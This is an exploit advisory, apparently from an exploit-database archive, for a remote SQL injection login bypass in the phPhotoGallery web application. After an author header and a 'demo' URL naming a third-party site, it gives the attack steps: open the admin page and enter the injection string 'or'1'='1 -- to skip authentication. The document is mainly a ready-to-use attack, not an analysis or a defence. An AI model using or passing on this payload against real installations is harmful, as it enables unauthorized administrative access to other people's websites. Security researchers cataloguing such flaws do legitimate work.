phPhotoGallery suffers from a remote SQL injection vulnerability that allows for login bypass.
d92b28488cc5a06f734a33138136af2d15351d6492877ff0ff78dab88cd9435a
#######################################################################
# Exploit Title: phPhotoGallery Login bypass
# Author: Err0r
# Date: 05.05.2011
# E-mail: err0riletisim@gmail.com
# Category: Web App.
# Note : Warning.
# Demo: http://www.extrastrength.com/pg/
# Price : Free
#######################################################################
[*] ## Exploit ##:
# http://victim/ [ENTER]
# http://victim/path/index.php?c=admin ~~>> Bypass
'or'1'='1 --
#######################################################################